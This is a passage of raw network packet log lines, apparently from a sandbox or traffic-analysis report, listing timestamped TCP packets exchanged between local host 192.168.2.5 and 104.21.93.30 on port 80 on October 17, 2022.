                                                                                                                                  Oct 17, 2022 22:06:28.727884054 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727894068 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.727910042 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727933884 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.727947950 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.727988958 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728013039 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728048086 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.728441954 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728481054 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728507996 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728508949 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.728533983 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728547096 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.728559971 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728585005 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728604078 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.728614092 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728640079 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728657007 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.728666067 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728692055 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728717089 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728739977 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.728743076 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728769064 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728771925 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.728795052 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728820086 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728837967 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.728847027 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728873014 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728877068 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.728898048 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728910923 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.728921890 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728945971 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728970051 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.728971958 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.728996992 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729008913 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.729022980 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729048967 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729068041 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.729073048 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729115963 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.729528904 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729557037 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729582071 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729608059 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729621887 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.729635954 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729660988 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729684114 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.729686022 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729711056 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729715109 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.729737043 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729756117 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.729763031 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729789972 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729818106 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729844093 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729846001 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.729866028 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.729868889 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729893923 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729908943 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.729919910 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729943991 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729964018 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.729969025 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.729995012 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.730015039 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.730021000 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.730046034 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.730061054 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.730496883 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.730523109 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.730547905 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.730568886 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.730586052 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.730609894 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.730612040 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.730637074 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.730647087 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.730663061 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.730689049 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.730707884 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.730871916 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.730918884 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.730938911 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.730966091 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.730971098 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.730992079 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731010914 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.731017113 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731031895 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.731040955 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731065035 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731077909 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.731090069 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731115103 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731137991 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.731139898 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731164932 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731184959 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.731189966 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731214046 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731225014 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.731236935 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731261969 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731280088 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.731288910 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731314898 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731324911 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.731339931 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731364965 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731374979 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.731390953 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731441975 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.731838942 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731853962 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.731864929 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731890917 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731916904 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731925011 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.731941938 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731966019 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.731966972 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.731992960 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.732017994 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.732018948 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.732043982 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.732058048 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.732069016 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.732095957 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.732112885 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.732122898 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.732150078 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.732162952 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.732172012 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.732198954 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.732218027 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.732223988 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.732249975 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.732269049 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.732275009 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.732300043 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.732311964 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.732325077 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.732351065 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.732378960 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.732554913 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.733129978 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733164072 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733189106 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733207941 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.733211994 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733222961 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.733237028 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733262062 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733280897 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.733287096 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733313084 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733324051 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.733338118 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733361006 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733371973 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.733383894 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733407974 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733417034 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.733433962 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733458042 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733468056 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.733481884 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733504057 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733514071 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.733527899 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733552933 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733566999 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.733577013 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733603001 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733613968 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.733628988 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733664036 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.733797073 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733823061 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733845949 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733860016 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.733870983 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733896971 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733903885 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.733922958 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733946085 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733952999 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.733971119 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.733994961 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734004021 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.734019995 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734045029 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734051943 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.734069109 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734095097 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734116077 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.734119892 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734144926 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734155893 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.734169960 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734194994 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734203100 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.734220028 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734246969 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734251976 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.734272957 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734297037 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734308004 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.734415054 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.734770060 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734800100 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734822035 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.734827042 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734853983 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734863043 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.734898090 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734925985 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734940052 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.734960079 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.734998941 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.735006094 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.735024929 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.735050917 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.735060930 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.735076904 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.735101938 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.735112906 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.735125065 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.735150099 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.735162020 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.735177994 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.735202074 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.735219955 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.735239983 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.735268116 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.735276937 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.735295057 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.735321045 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.735343933 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.735347986 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.735383987 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.735793114 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.739949942 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.751612902 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.751671076 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.751701117 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.751729012 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.751761913 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.751792908 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.751827002 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.751827002 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.751857042 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.751887083 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.751893044 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.751910925 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.751921892 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.751952887 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.751971960 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.751981974 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.752011061 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.752026081 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.752041101 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.752072096 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.752089977 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.752099991 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.752127886 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.752163887 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.755072117 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.755125046 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.755152941 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.755187035 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.755214930 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.755248070 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.755251884 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.755280018 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.755307913 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.755311012 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.755340099 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.755362034 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.755372047 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.755395889 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.755419016 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.755438089 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.755441904 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.755460978 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.755482912 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.755489111 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.755513906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.755542040 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:28.755559921 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:28.755568981 CEST8049692104.21.93.30192.168.2.5
